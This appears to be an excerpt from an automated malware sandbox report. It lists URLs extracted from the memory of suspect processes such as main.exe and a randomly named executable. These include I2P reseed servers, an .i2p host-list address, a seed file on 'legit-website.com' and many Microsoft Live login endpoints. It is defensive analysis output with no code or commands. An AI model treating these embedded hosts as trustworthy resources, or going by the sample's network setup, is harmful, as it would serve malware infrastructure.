Source: svchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee
Source: svchost.exe, 0000001F.00000003.3111366178.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: svchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: update.pkg.11.drString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt
Source: main.exe, 00000016.00000002.3155678668.000002235025D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/
Source: main.exe, 00000016.00000002.3155678668.000002235025D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtF&P#
Source: main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su3
Source: main.exe, 00000016.00000002.3155678668.000002235025D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drString found in binary or memory: http://stats.i2p/cgi-bin/newhosts.txt
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D37932C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
Source: svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
Source: svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
Source: svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
Source: svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023950758.000001D379357000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drString found in binary or memory: https://banana.incognet.io/
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://banana.incognet.io/p
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drString found in binary or memory: https://i2p.ghativega.in/
Source: main.exe, 00000016.00000002.3155678668.00000223502E7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471613149.00000223502F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i2p.ghativega.in/b.c
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drString found in binary or memory: https://i2p.mooo.com/netDb/
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drString found in binary or memory: https://i2p.novg.net/
Source: main.exe, 00000016.00000002.3155678668.000002235025D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i2p.novg.net/:
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drString found in binary or memory: https://i2pd.readthedocs.io/en/latest/user-guide/configuration/
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3262201152.00000270D4100000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drString found in binary or memory: https://i2pseed.creativecowpat.net:8443/
Source: main.exe, 00000020.00000002.3262201152.00000270D4100000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i2pseed.creativecowpat.net:8443/G
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drString found in binary or memory: https://legit-website.com/i2pseeds.su3
Source: svchost.exe, 0000001F.00000002.3262816840.000001D378B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live
Source: svchost.exe, 0000001F.00000002.3263489218.000001D379854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
Source: svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srfs
Source: svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024014344.000001D37936B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024014344.000001D37936B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024014344.000001D37936B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D37932C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
Source: svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srfr.srf
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
Source: svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srfrf
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3262816840.000001D378AED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
Source: svchost.exe, 0000001F.00000002.3263875376.000001D3798C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srfA7826
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
Source: svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srfs.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263129207.000001D379337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
Source: svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsec
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023767682.000001D379310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 0000001F.00000003.3024014344.000001D37936B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srfuerP
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 0000001F.00000003.3024014344.000001D37936B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srfD
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024014344.000001D37936B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111366178.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024014344.000001D37936B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111366178.000001D37936E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024014344.000001D37936B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D37932C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
Source: svchost.exe, 0000001F.00000003.3156260035.000001D37935A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263426432.000001D37984A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-Dh1
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024014344.000001D37936B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263588064.000001D379883000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
Source: svchost.exe, 0000001F.00000003.3023697164.000001D37932C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
Source: svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023950758.000001D379357000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
Source: svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
